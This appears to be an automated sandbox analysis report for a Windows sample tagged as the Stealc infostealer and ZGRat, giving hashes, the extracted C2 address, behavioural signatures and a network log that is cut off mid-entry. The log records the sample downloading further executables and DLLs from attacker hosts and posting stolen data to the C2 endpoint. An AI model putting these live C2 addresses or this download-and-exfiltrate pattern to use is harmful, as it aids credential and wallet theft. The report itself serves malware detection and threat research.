Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

cryptolaemus

windows10-2004-x64

10

cryptolaemus

windows11-21h2-x64

10

Analysis

  • max time kernel
    143s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10/05/2024, 09:29 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    1aa2463e6b3373a1769dd41d2ed055fa045cd481100a5f06b8e241e6e3241076.exe

  • Size

    372KB

  • MD5

    08c74ce76561550261137454935bfafe

  • SHA1

    77d3e1a72eb918e95dceb6134be6e5d56364afc7

  • SHA256

    1aa2463e6b3373a1769dd41d2ed055fa045cd481100a5f06b8e241e6e3241076

  • SHA512

    25ab864b2d16913632893a7e8775877860dd864e122f3fa46a64344f6016bfa8cbdb22259bb9fcc0fbf0310a30ed9c9e60812e8c24422ecbeb1f98481bb5e190

  • SSDEEP

    6144:CKnC1VEKPHySHREDpdksUZBg7C6vZb/TwZ7LylNK6nhByUSXyYTkJft1:CKnCgaSSxELksMUvlLwZ7LKjJ8kJl1

Score
10/10
stealczgratdiscoveryratspywarestealer

Malware Config

Extracted

Family

stealc

C2

http://185.172.128.150

Attributes
  • url_path

    /c698e1bc8a2f5e6d.php

Signatures

  • Detect ZGRat V1 3 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • ZGRat

    ZGRat is remote access trojan written in C#.

    ratzgrat
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 50 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 7 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1aa2463e6b3373a1769dd41d2ed055fa045cd481100a5f06b8e241e6e3241076.exe
    "C:\Users\Admin\AppData\Local\Temp\1aa2463e6b3373a1769dd41d2ed055fa045cd481100a5f06b8e241e6e3241076.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1596
    • C:\Users\Admin\AppData\Local\Temp\u18c.0.exe
      "C:\Users\Admin\AppData\Local\Temp\u18c.0.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      PID:2120
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 2120 -s 2360
        3⤵
        • Program crash
        PID:4396
    • C:\Users\Admin\AppData\Local\Temp\u18c.1.exe
      "C:\Users\Admin\AppData\Local\Temp\u18c.1.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:4636
      • C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
        "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4968
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 1140
      2⤵
      • Program crash
      PID:1888
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1596 -ip 1596
    1⤵
      PID:4860
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4240 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:8
      1⤵
        PID:4660
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4188 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:3
        1⤵
          PID:4544
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2120 -ip 2120
          1⤵
            PID:836

          Network

          • flag-us
            DNS
            104.219.191.52.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            104.219.191.52.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            79.190.18.2.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            79.190.18.2.in-addr.arpa
            IN PTR
            Response
            79.190.18.2.in-addr.arpa
            IN PTR
            a2-18-190-79deploystaticakamaitechnologiescom
          • flag-us
            DNS
            76.32.126.40.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            76.32.126.40.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            95.221.229.192.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            95.221.229.192.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            183.142.211.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            183.142.211.20.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            196.249.167.52.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            196.249.167.52.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            241.150.49.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            241.150.49.20.in-addr.arpa
            IN PTR
            Response
          • flag-de
            GET
            http://185.172.128.90/cpa/ping.php?substr=eight&s=ab&sub=0
            1aa2463e6b3373a1769dd41d2ed055fa045cd481100a5f06b8e241e6e3241076.exe
            Remote address:
            185.172.128.90:80
            Request
            GET /cpa/ping.php?substr=eight&s=ab&sub=0 HTTP/1.1
            Host: 185.172.128.90
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:29:45 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Content-Length: 1
            Content-Type: text/html; charset=UTF-8
          • flag-us
            DNS
            103.169.127.40.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            103.169.127.40.in-addr.arpa
            IN PTR
            Response
          • flag-de
            GET
            http://185.172.128.228/ping.php?substr=eight
            1aa2463e6b3373a1769dd41d2ed055fa045cd481100a5f06b8e241e6e3241076.exe
            Remote address:
            185.172.128.228:80
            Request
            GET /ping.php?substr=eight HTTP/1.1
            Host: 185.172.128.228
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:29:47 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Content-Length: 0
            Content-Type: text/html; charset=UTF-8
          • flag-de
            GET
            http://185.172.128.59/syncUpd.exe
            1aa2463e6b3373a1769dd41d2ed055fa045cd481100a5f06b8e241e6e3241076.exe
            Remote address:
            185.172.128.59:80
            Request
            GET /syncUpd.exe HTTP/1.1
            Host: 185.172.128.59
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:29:48 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Last-Modified: Fri, 10 May 2024 09:15:01 GMT
            ETag: "39800-61815f86f932a"
            Accept-Ranges: bytes
            Content-Length: 235520
            Content-Type: application/x-msdos-program
          • flag-us
            DNS
            90.128.172.185.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            90.128.172.185.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            171.39.242.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            171.39.242.20.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            142.53.16.96.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            142.53.16.96.in-addr.arpa
            IN PTR
            Response
            142.53.16.96.in-addr.arpa
            IN PTR
            a96-16-53-142deploystaticakamaitechnologiescom
          • flag-us
            DNS
            228.128.172.185.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            228.128.172.185.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            59.128.172.185.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            59.128.172.185.in-addr.arpa
            IN PTR
            Response
          • flag-de
            GET
            http://185.172.128.228/BroomSetup.exe
            1aa2463e6b3373a1769dd41d2ed055fa045cd481100a5f06b8e241e6e3241076.exe
            Remote address:
            185.172.128.228:80
            Request
            GET /BroomSetup.exe HTTP/1.1
            Host: 185.172.128.228
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:29:55 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Last-Modified: Fri, 15 Mar 2024 11:59:56 GMT
            ETag: "4a4030-613b1bf118700"
            Accept-Ranges: bytes
            Content-Length: 4866096
            Content-Type: application/x-msdos-program
          • flag-us
            DNS
            svc.iolo.com
            u18c.1.exe
            Remote address:
            8.8.8.8:53
            Request
            svc.iolo.com
            IN A
            Response
            svc.iolo.com
            IN A
            20.157.87.45
          • flag-us
            POST
            http://svc.iolo.com/__svc/sbv/DownloadManager.ashx
            u18c.1.exe
            Remote address:
            20.157.87.45:80
            Request
            POST /__svc/sbv/DownloadManager.ashx HTTP/1.0
            Connection: keep-alive
            Content-Length: 300
            Host: svc.iolo.com
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Encoding: identity
            User-Agent: Mozilla/3.0 (compatible; Indy Library)
            Response
            HTTP/1.1 200 OK
            cache-control: private
            content-length: 256
            content-type: text/html; charset=utf-8
            x-whom: Ioloweb5
            date: Fri, 10 May 2024 09:30:00 GMT
            set-cookie: SERVERID=svc5; path=/
            connection: close
          • flag-us
            DNS
            45.87.157.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            45.87.157.20.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            download.iolo.net
            Remote address:
            8.8.8.8:53
            Request
            download.iolo.net
            IN A
            Response
            download.iolo.net
            IN CNAME
            iolo0.b-cdn.net
            iolo0.b-cdn.net
            IN A
            143.244.56.50
          • flag-fr
            HEAD
            https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.1.11/SystemMechanic.exe
            Remote address:
            143.244.56.50:443
            Request
            HEAD /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.1.11/SystemMechanic.exe HTTP/2.0
            host: download.iolo.net
            accept: */*
            accept-encoding: identity
            user-agent: Microsoft BITS/7.8
            Response
            HTTP/2.0 200
            date: Fri, 10 May 2024 09:30:08 GMT
            content-type: application/octet-stream
            content-length: 58919336
            server: BunnyCDN-FR1-1073
            cdn-pullzone: 1654350
            cdn-uid: 5b8ea5d8-68d6-4057-a57d-a5f315142028
            cdn-requestcountrycode: GB
            cache-control: public, max-age=259200
            last-modified: Mon, 29 Apr 2024 18:38:19 GMT
            cdn-storageserver: DE-664
            cdn-fileserver: 594
            cdn-proxyver: 1.04
            cdn-requestpullsuccess: True
            cdn-requestpullcode: 206
            cdn-cachedat: 05/06/2024 22:02:11
            cdn-edgestorageid: 1187
            cdn-status: 200
            cdn-requestid: f6c7caab9f836b2813476a027b0cd3be
            cdn-cache: HIT
            accept-ranges: bytes
          • flag-fr
            GET
            https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.1.11/SystemMechanic.exe
            Remote address:
            143.244.56.50:443
            Request
            GET /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.1.11/SystemMechanic.exe HTTP/2.0
            host: download.iolo.net
            accept: */*
            accept-encoding: identity
            if-unmodified-since: Mon, 29 Apr 2024 18:38:19 GMT
            user-agent: Microsoft BITS/7.8
            Response
            HTTP/2.0 200
            date: Fri, 10 May 2024 09:30:08 GMT
            content-type: application/octet-stream
            content-length: 58919336
            server: BunnyCDN-FR1-1073
            cdn-pullzone: 1654350
            cdn-uid: 5b8ea5d8-68d6-4057-a57d-a5f315142028
            cdn-requestcountrycode: GB
            cache-control: public, max-age=259200
            last-modified: Mon, 29 Apr 2024 18:38:19 GMT
            cdn-storageserver: DE-664
            cdn-fileserver: 594
            cdn-proxyver: 1.04
            cdn-requestpullsuccess: True
            cdn-requestpullcode: 206
            cdn-cachedat: 05/06/2024 22:02:11
            cdn-edgestorageid: 1187
            cdn-status: 200
            cdn-requestid: da61d1abedf756e67b14b8c339244b54
            cdn-cache: HIT
            accept-ranges: bytes
          • flag-us
            DNS
            50.56.244.143.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            50.56.244.143.in-addr.arpa
            IN PTR
            Response
            50.56.244.143.in-addr.arpa
            IN PTR
            143-244-56-50 bunnyinfranet
          • flag-us
            DNS
            chromewebstore.googleapis.com
            Remote address:
            8.8.8.8:53
            Request
            chromewebstore.googleapis.com
            IN A
            Response
            chromewebstore.googleapis.com
            IN A
            172.217.16.234
            chromewebstore.googleapis.com
            IN A
            142.250.200.10
            chromewebstore.googleapis.com
            IN A
            142.250.200.42
            chromewebstore.googleapis.com
            IN A
            216.58.201.106
            chromewebstore.googleapis.com
            IN A
            216.58.204.74
            chromewebstore.googleapis.com
            IN A
            172.217.169.10
            chromewebstore.googleapis.com
            IN A
            216.58.212.202
            chromewebstore.googleapis.com
            IN A
            172.217.169.74
            chromewebstore.googleapis.com
            IN A
            172.217.169.42
            chromewebstore.googleapis.com
            IN A
            142.250.179.234
            chromewebstore.googleapis.com
            IN A
            142.250.180.10
            chromewebstore.googleapis.com
            IN A
            142.250.187.202
            chromewebstore.googleapis.com
            IN A
            142.250.187.234
            chromewebstore.googleapis.com
            IN A
            142.250.178.10
          • flag-us
            DNS
            chromewebstore.googleapis.com
            Remote address:
            8.8.8.8:53
            Request
            chromewebstore.googleapis.com
            IN Unknown
            Response
          • flag-us
            DNS
            234.16.217.172.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            234.16.217.172.in-addr.arpa
            IN PTR
            Response
            234.16.217.172.in-addr.arpa
            IN PTR
            mad08s04-in-f101e100net
            234.16.217.172.in-addr.arpa
            IN PTR
            lhr48s28-in-f10�I
          • flag-us
            POST
            http://svc.iolo.com/__svc/sbv/DownloadManager.ashx
            u18c.1.exe
            Remote address:
            20.157.87.45:80
            Request
            POST /__svc/sbv/DownloadManager.ashx HTTP/1.0
            Connection: keep-alive
            Content-Length: 300
            Host: svc.iolo.com
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Encoding: identity
            User-Agent: Mozilla/3.0 (compatible; Indy Library)
            Response
            HTTP/1.1 200 OK
            cache-control: private
            content-length: 192
            content-type: text/html; charset=utf-8
            x-whom: Ioloweb5
            date: Fri, 10 May 2024 09:30:15 GMT
            set-cookie: SERVERID=svc5; path=/
            connection: close
          • flag-us
            DNS
            36.56.20.217.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            36.56.20.217.in-addr.arpa
            IN PTR
            Response
          • flag-de
            POST
            http://185.172.128.150/c698e1bc8a2f5e6d.php
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            POST /c698e1bc8a2f5e6d.php HTTP/1.1
            Content-Type: multipart/form-data; boundary=----HJJEHJJKJEGHJJKEBFBG
            Host: 185.172.128.150
            Content-Length: 217
            Connection: Keep-Alive
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:33 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Vary: Accept-Encoding
            Content-Length: 156
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: text/html; charset=UTF-8
          • flag-de
            POST
            http://185.172.128.150/c698e1bc8a2f5e6d.php
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            POST /c698e1bc8a2f5e6d.php HTTP/1.1
            Content-Type: multipart/form-data; boundary=----GCBKECAKFBGCAKECGIEH
            Host: 185.172.128.150
            Content-Length: 268
            Connection: Keep-Alive
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:33 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Vary: Accept-Encoding
            Content-Length: 1520
            Keep-Alive: timeout=5, max=99
            Connection: Keep-Alive
            Content-Type: text/html; charset=UTF-8
          • flag-de
            POST
            http://185.172.128.150/c698e1bc8a2f5e6d.php
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            POST /c698e1bc8a2f5e6d.php HTTP/1.1
            Content-Type: multipart/form-data; boundary=----JJDBFCAEBFIJJKFHDAEC
            Host: 185.172.128.150
            Content-Length: 267
            Connection: Keep-Alive
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:33 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Vary: Accept-Encoding
            Content-Length: 5416
            Keep-Alive: timeout=5, max=98
            Connection: Keep-Alive
            Content-Type: text/html; charset=UTF-8
          • flag-de
            POST
            http://185.172.128.150/c698e1bc8a2f5e6d.php
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            POST /c698e1bc8a2f5e6d.php HTTP/1.1
            Content-Type: multipart/form-data; boundary=----ECGDBAEHIJKKFHIEGCBG
            Host: 185.172.128.150
            Content-Length: 4915
            Connection: Keep-Alive
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:33 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Content-Length: 0
            Keep-Alive: timeout=5, max=97
            Connection: Keep-Alive
            Content-Type: text/html; charset=UTF-8
          • flag-de
            GET
            http://185.172.128.150/b7d0cfdb1d966bdd/sqlite3.dll
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            GET /b7d0cfdb1d966bdd/sqlite3.dll HTTP/1.1
            Host: 185.172.128.150
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:33 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT
            ETag: "10e436-5e7eeebed8d80"
            Accept-Ranges: bytes
            Content-Length: 1106998
            Content-Type: application/x-msdos-program
          • flag-de
            POST
            http://185.172.128.150/c698e1bc8a2f5e6d.php
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            POST /c698e1bc8a2f5e6d.php HTTP/1.1
            Content-Type: multipart/form-data; boundary=----IECFIEGDBKJKFIDHIECG
            Host: 185.172.128.150
            Content-Length: 359
            Connection: Keep-Alive
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:34 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Content-Length: 0
            Keep-Alive: timeout=5, max=95
            Connection: Keep-Alive
            Content-Type: text/html; charset=UTF-8
          • flag-de
            POST
            http://185.172.128.150/c698e1bc8a2f5e6d.php
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            POST /c698e1bc8a2f5e6d.php HTTP/1.1
            Content-Type: multipart/form-data; boundary=----AEHIDAKECFIEBGDHJEBK
            Host: 185.172.128.150
            Content-Length: 359
            Connection: Keep-Alive
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:35 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Content-Length: 0
            Keep-Alive: timeout=5, max=94
            Connection: Keep-Alive
            Content-Type: text/html; charset=UTF-8
          • flag-de
            GET
            http://185.172.128.150/b7d0cfdb1d966bdd/freebl3.dll
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            GET /b7d0cfdb1d966bdd/freebl3.dll HTTP/1.1
            Host: 185.172.128.150
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:35 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
            ETag: "a7550-5e7ebd4425100"
            Accept-Ranges: bytes
            Content-Length: 685392
            Content-Type: application/x-msdos-program
          • flag-de
            GET
            http://185.172.128.150/b7d0cfdb1d966bdd/mozglue.dll
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            GET /b7d0cfdb1d966bdd/mozglue.dll HTTP/1.1
            Host: 185.172.128.150
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:35 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
            ETag: "94750-5e7ebd4425100"
            Accept-Ranges: bytes
            Content-Length: 608080
            Content-Type: application/x-msdos-program
          • flag-de
            GET
            http://185.172.128.150/b7d0cfdb1d966bdd/msvcp140.dll
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            GET /b7d0cfdb1d966bdd/msvcp140.dll HTTP/1.1
            Host: 185.172.128.150
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:36 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
            ETag: "6dde8-5e7ebd4425100"
            Accept-Ranges: bytes
            Content-Length: 450024
            Content-Type: application/x-msdos-program
          • flag-de
            GET
            http://185.172.128.150/b7d0cfdb1d966bdd/nss3.dll
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            GET /b7d0cfdb1d966bdd/nss3.dll HTTP/1.1
            Host: 185.172.128.150
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:36 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
            ETag: "1f3950-5e7ebd4425100"
            Accept-Ranges: bytes
            Content-Length: 2046288
            Content-Type: application/x-msdos-program
          • flag-de
            GET
            http://185.172.128.150/b7d0cfdb1d966bdd/softokn3.dll
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            GET /b7d0cfdb1d966bdd/softokn3.dll HTTP/1.1
            Host: 185.172.128.150
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:37 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
            ETag: "3ef50-5e7ebd4425100"
            Accept-Ranges: bytes
            Content-Length: 257872
            Content-Type: application/x-msdos-program
          • flag-de
            GET
            http://185.172.128.150/b7d0cfdb1d966bdd/vcruntime140.dll
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            GET /b7d0cfdb1d966bdd/vcruntime140.dll HTTP/1.1
            Host: 185.172.128.150
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:38 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
            ETag: "13bf0-5e7ebd4425100"
            Accept-Ranges: bytes
            Content-Length: 80880
            Content-Type: application/x-msdos-program
          • flag-de
            POST
            http://185.172.128.150/c698e1bc8a2f5e6d.php
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            POST /c698e1bc8a2f5e6d.php HTTP/1.1
            Content-Type: multipart/form-data; boundary=----GIEBAECAKKFCBFIEGCBK
            Host: 185.172.128.150
            Content-Length: 827
            Connection: Keep-Alive
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:38 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Content-Length: 0
            Keep-Alive: timeout=5, max=87
            Connection: Keep-Alive
            Content-Type: text/html; charset=UTF-8
          • flag-de
            POST
            http://185.172.128.150/c698e1bc8a2f5e6d.php
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            POST /c698e1bc8a2f5e6d.php HTTP/1.1
            Content-Type: multipart/form-data; boundary=----CGIEBAFHJJDBGCAKJJKF
            Host: 185.172.128.150
            Content-Length: 267
            Connection: Keep-Alive
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:38 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Vary: Accept-Encoding
            Content-Length: 2408
            Keep-Alive: timeout=5, max=86
            Connection: Keep-Alive
            Content-Type: text/html; charset=UTF-8
          • flag-de
            POST
            http://185.172.128.150/c698e1bc8a2f5e6d.php
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            POST /c698e1bc8a2f5e6d.php HTTP/1.1
            Content-Type: multipart/form-data; boundary=----DHJJEGHIIDAFIDHJDHJE
            Host: 185.172.128.150
            Content-Length: 265
            Connection: Keep-Alive
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:38 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Vary: Accept-Encoding
            Content-Length: 2052
            Keep-Alive: timeout=5, max=85
            Connection: Keep-Alive
            Content-Type: text/html; charset=UTF-8
          • flag-de
            POST
            http://185.172.128.150/c698e1bc8a2f5e6d.php
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            POST /c698e1bc8a2f5e6d.php HTTP/1.1
            Content-Type: multipart/form-data; boundary=----FCFIEHCFIECBGCBFHIJJ
            Host: 185.172.128.150
            Content-Length: 15735
            Connection: Keep-Alive
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:39 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Content-Length: 0
            Keep-Alive: timeout=5, max=84
            Connection: Keep-Alive
            Content-Type: text/html; charset=UTF-8
          • flag-de
            POST
            http://185.172.128.150/c698e1bc8a2f5e6d.php
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            POST /c698e1bc8a2f5e6d.php HTTP/1.1
            Content-Type: multipart/form-data; boundary=----EBGIEGCFHCFHIDHIJECA
            Host: 185.172.128.150
            Content-Length: 15731
            Connection: Keep-Alive
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:39 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Content-Length: 0
            Keep-Alive: timeout=5, max=83
            Connection: Keep-Alive
            Content-Type: text/html; charset=UTF-8
          • flag-de
            POST
            http://185.172.128.150/c698e1bc8a2f5e6d.php
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            POST /c698e1bc8a2f5e6d.php HTTP/1.1
            Content-Type: multipart/form-data; boundary=----BFHJJJDAFBKEBGDGHCGD
            Host: 185.172.128.150
            Content-Length: 91711
            Connection: Keep-Alive
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:40 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Content-Length: 0
            Keep-Alive: timeout=5, max=82
            Connection: Keep-Alive
            Content-Type: text/html; charset=UTF-8
          • flag-de
            POST
            http://185.172.128.150/c698e1bc8a2f5e6d.php
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            POST /c698e1bc8a2f5e6d.php HTTP/1.1
            Content-Type: multipart/form-data; boundary=----AFIEGCAECGCAEBFHDHIE
            Host: 185.172.128.150
            Content-Length: 270
            Connection: Keep-Alive
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:41 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Content-Length: 0
            Keep-Alive: timeout=5, max=81
            Connection: Keep-Alive
            Content-Type: text/html; charset=UTF-8
          • flag-us
            DNS
            150.128.172.185.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            150.128.172.185.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
